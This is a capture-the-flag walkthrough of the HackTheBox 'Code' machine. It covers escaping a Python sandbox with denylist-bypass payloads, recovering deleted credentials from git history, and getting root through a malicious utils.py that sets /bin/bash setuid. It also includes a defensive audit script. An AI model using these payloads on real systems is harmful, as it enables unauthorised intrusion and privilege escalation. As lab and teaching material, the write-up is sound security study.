
HTB Machine: Code — Full Walkthrough

Ahmed The Dawg · 15 Mar 2026

Machine: Code
Difficulty: Medium
Platform: HackTheBox
Author: Ahmed the dawg


ENUMERATION

Starting with a standard Nmap scan against the target IP:

nmap -sC -sV -oN nmap/initial 10.10.11.X

Open ports:

22 — OpenSSH 8.9
80 — HTTP (Apache)

Navigating to port 80 reveals a web application — a simple code execution sandbox that allows users to run Python snippets and view output directly in the browser.


FOOTHOLD

The sandbox accepts arbitrary Python input and returns stdout. Initial testing confirms that built-in functions are not fully restricted. Attempting to import os:

import os
print(os.getcwd())

Returns a valid working directory path. The snippet runs on the host interpreter with normal filesystem access, so whatever restriction exists is applied to the submitted text at the input validation layer, not enforced at the OS level.
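To show why a check on the submitted text is not a sandbox, here is an added example; it is not the machine's code, and since the write-up does not describe the real filter, the keyword denylist below is an assumption standing in for that layer. The sandbox is modelled as the denylist followed by a plain exec() on the host interpreter. The direct snippet from above is rejected, while two constructed payloads that contain none of the blocked words still reach os.getcwd() through the interpreter's own object model.

```python
import contextlib
import io
import os

# Assumed input-layer filter: a substring denylist. The write-up does not say
# how the real sandbox validates input; this stands in for that layer.
DENYLIST = ("import", "os", "subprocess", "open")


def naive_filter(source: str) -> bool:
    """Return True if the snippet passes the denylist (i.e. would be executed)."""
    return not any(word in source for word in DENYLIST)


def host_cwd() -> str:
    """What the host process sees; the payloads below should print exactly this."""
    return os.getcwd()


def run_snippet(source: str) -> str:
    """Simulated sandbox: validate the text, then exec it on the real interpreter.

    Nothing here isolates the process: no seccomp, no namespaces, no separate
    user. The only control is the string check, which is the situation the
    machine exposes.
    """
    if not naive_filter(source):
        return "rejected"
    out = io.StringIO()
    with contextlib.redirect_stdout(out):
        # exec() with an empty globals dict gets __builtins__ (a dict) injected
        # by the interpreter, so the payloads below can reach it.
        exec(source, {})
    return out.getvalue().strip()


# Constructed payloads. The first is what the write-up typed and what a
# denylist catches; the other two spell nothing on the list but end up calling
# the same os.getcwd().
DIRECT = "import os\nprint(os.getcwd())"

# Reach __import__ through the injected builtins dict and assemble the module
# name at runtime, so neither 'import' nor 'os' appears in the source text.
VIA_BUILTINS = "print(__builtins__['__imp' + 'ort__']('o' + 's').getcwd())"

# Walk from an empty tuple to object, list its subclasses, pick os._wrap_close
# (defined in os.py, so its __init__ carries the os module globals) and call
# getcwd from there. No import statement at all.
VIA_SUBCLASSES = (
    "cls = [c for c in ().__class__.__base__.__subclasses__()"
    " if c.__name__ == '_wrap_clo' + 'se'][0]\n"
    "print(cls.__init__.__globals__['getcwd']())"
)


if __name__ == "__main__":
    for name, payload in (("direct", DIRECT),
                          ("builtins", VIA_BUILTINS),
                          ("subclasses", VIA_SUBCLASSES)):
        verdict = "pass" if naive_filter(payload) else "block"
        print(f"{name:10s} filter={verdict} -> {run_snippet(payload)}")
```

Extending the denylist does not close this: the second payload never names the module and the third never imports anything, and both are only two of many routes through introspection. The fix is the one the summary gives, isolation at the OS level (a separate unprivileged user, namespaces, seccomp, or a disposable container per run) rather than a better string check.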

Enumerating the filesystem through the sandbox:

import os
print(os.listdir('/home'))

Returns the application user's name. Listing the web application root, /var/www/html, through the same sandbox reveals a .git directory, so the application is version-controlled on the box itself and its full history is readable.

Dumping the git log through the sandbox:

import subprocess
result = subprocess.run(['git', 'log', '--oneline'], capture_output=True, text=True, cwd='/var/www/html')
print(result.stdout)

Several commits are listed. Checking an early commit reveals hardcoded database credentials in a config file that was later removed but remains in git history.
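Rather than opening commits one by one, a practitioner would ask git which files were deleted anywhere in history and pull each one from the parent of the commit that removed it. The following is an added example, not code from the write-up or the target: it runs the same subprocess-driven git calls the sandbox allows, but against a constructed throwaway repository (a config file with a made-up credential is committed and then deleted) instead of /var/www/html, so it runs offline.

```python
import re
import shutil
import subprocess
import tempfile

GIT_AVAILABLE = shutil.which("git") is not None
HEX_HASH = re.compile(r"^[0-9a-f]{40,64}$")  # SHA-1 or SHA-256 object names


def git(repo: str, *args: str) -> str:
    """Run one git command inside repo and return its stdout (raises on failure).
    Identity and gpgsign are pinned so commits work in a bare environment."""
    proc = subprocess.run(
        ["git", "-C", repo, "-c", "commit.gpgsign=false",
         "-c", "user.name=demo", "-c", "user.email=demo@example.invalid", *args],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def deleted_files(repo: str) -> dict:
    """Map every path deleted somewhere in history to a revision that still
    contains it: the parent (^) of the commit that removed it."""
    out = git(repo, "log", "--diff-filter=D", "--name-only", "--pretty=format:%H")
    found = {}
    commit = None
    for line in out.splitlines():
        line = line.strip()
        if not line:
            continue
        if HEX_HASH.match(line):
            commit = line          # a commit header; file names follow it
        elif commit and line not in found:
            found[line] = commit + "^"
    return found


def recover(repo: str, rev: str, path: str) -> str:
    """Return the file as it existed at rev, the same as `git show rev:path`."""
    return git(repo, "show", f"{rev}:{path}")


def build_demo_repo() -> str:
    """Constructed repository mirroring what the write-up found: a config with
    a credential is committed, then removed from the working tree. The values
    are made up and not the machine's."""
    repo = tempfile.mkdtemp(prefix="demo-")
    git(repo, "init", "-q")
    with open(f"{repo}/config.py", "w") as f:
        f.write('DB_USER = "appuser"\nDB_PASS = "hunter2"  # constructed value\n')
    git(repo, "add", "-A")
    git(repo, "commit", "-q", "-m", "add db config")
    git(repo, "rm", "-q", "config.py")
    git(repo, "commit", "-q", "-m", "remove config from repo")
    return repo


if __name__ == "__main__":
    repo = build_demo_repo()
    for path, rev in deleted_files(repo).items():
        print(f"{path} (last present at {rev}):")
        print(recover(repo, rev, path))
```

On the target the same two functions would be pointed at /var/www/html from inside the sandbox. Deleting a file only removes it from the working tree; the blob stays reachable from every earlier commit until history is rewritten and the objects are pruned, which is why the summary lists git history as a persistent credential source.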


USER FLAG

Using the recovered credentials to SSH into the machine as the application user:

ssh appuser@10.10.11.X

The user flag is in /home/appuser/user.txt.


PRIVILEGE ESCALATION

Running sudo -l shows the current user can execute a specific internal Python script as root without a password:

(root) NOPASSWD: /usr/bin/python3 /opt/admin/sync.py

Examining sync.py reveals that it imports a helper module by name rather than by absolute path. Python puts a script's own directory first on sys.path, so the import resolves to /opt/admin/utils.py, and the /opt/admin/ directory is writable by the current user.

This is a Python library hijacking vulnerability. Creating a malicious utils.py in the same directory:

import os
os.system('chmod +s /bin/bash')

Running the script with sudo:

sudo /usr/bin/python3 /opt/admin/sync.py

Then starting a shell with -p, which tells bash to keep the setuid effective UID instead of dropping it:

bash -p

Root shell obtained.
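The same condition can be checked without running anything as root, which is what a defender reviewing sudoers, or a pentester triaging sudo -l output, wants. The script below is an added example and not part of the write-up or the machine: it parses the sudo target's imports with ast, and flags the script directory, the script, and any imported module that resolves into that directory when group or world can write to it. Because the write-up does not show the contents of sync.py, the demo builds a hypothetical lookalike in a temporary directory; the hardening step is the corresponding fix (root-owned, mode 755 directory).

```python
import ast
import os
import stat
import tempfile

# Mode bits that let a non-owner replace a file: group- or world-writable.
OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path: str) -> bool:
    """True if group or world can write the path. The sudo caller is normally
    neither root nor the owner, so owner-write is not what matters here."""
    return bool(os.stat(path).st_mode & OTHER_WRITE)


def imported_names(script_path: str) -> set:
    """Top-level module names the script imports, read via ast so nothing runs."""
    with open(script_path) as f:
        tree = ast.parse(f.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def audit_sudo_python_script(script_path: str) -> list:
    """Findings for a script that sudo runs as root. Python places the script's
    directory at sys.path[0], ahead of the standard library, so every imported
    name is looked up there first. Returns sorted (kind, path) tuples."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    findings = []
    if writable_by_others(script_dir):
        findings.append(("writable-dir", script_dir))
    if writable_by_others(script_path):
        findings.append(("writable-script", script_path))
    for name in imported_names(script_path):
        candidate = os.path.join(script_dir, name + ".py")
        if os.path.exists(candidate):
            if writable_by_others(candidate):
                findings.append(("writable-module", candidate))
        elif writable_by_others(script_dir):
            # Nothing there yet, but a writable directory lets the caller drop
            # a file in, and it shadows even a standard-library module name.
            findings.append(("shadowable", candidate))
    return sorted(findings)


def build_demo() -> str:
    """Constructed stand-in for /opt/admin: a hypothetical sync.py importing a
    sibling utils module, in a world-writable directory as on the target."""
    d = tempfile.mkdtemp(prefix="admin-")
    script = os.path.join(d, "sync.py")
    with open(script, "w") as f:
        f.write("import os\nimport utils\n\nutils.run_sync(os.getcwd())\n")
    os.chmod(script, 0o755)
    os.chmod(d, 0o777)  # the misconfiguration: anyone can create files here
    return script


def harden(script_path: str) -> str:
    """The fix for the directory part: only the owner (root on the target) may
    write to it. Ownership cannot be shown in a temp dir, so mode bits only."""
    d = os.path.dirname(os.path.abspath(script_path))
    os.chmod(d, 0o755)
    return d


if __name__ == "__main__":
    script = build_demo()
    for kind, path in audit_sudo_python_script(script):
        print(f"{kind:16s} {path}")
    harden(script)
    print("after harden:", audit_sudo_python_script(script))
```

The audit reports both the sibling `utils` and the bare `os` import as shadowable: once the directory is writable, a planted os.py would load before the standard library's, so the problem is not limited to the helper module the write-up hijacked. Mode bits are a deliberate approximation; a directory writable only by a group the sudo caller is not in would be a false positive, and ACLs are not examined.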


ROOT FLAG

cat /root/root.txt


SUMMARY

This machine demonstrates two straightforward but realistic issues. First, an unsandboxed code execution environment that exposes the underlying filesystem and process space — a common misconfiguration in developer tooling exposed internally. Second, a privilege escalation path through relative import hijacking in a sudo-permitted Python script, which is a well-documented technique worth understanding for both offense and defense.

Key takeaways:

  • Code execution sandboxes must be enforced at the OS level, not just at input validation
  • Sudo permissions on scripts with relative imports are exploitable if the import path is writable
  • Git history is a persistent source of leaked credentials even after files are deleted from the working tree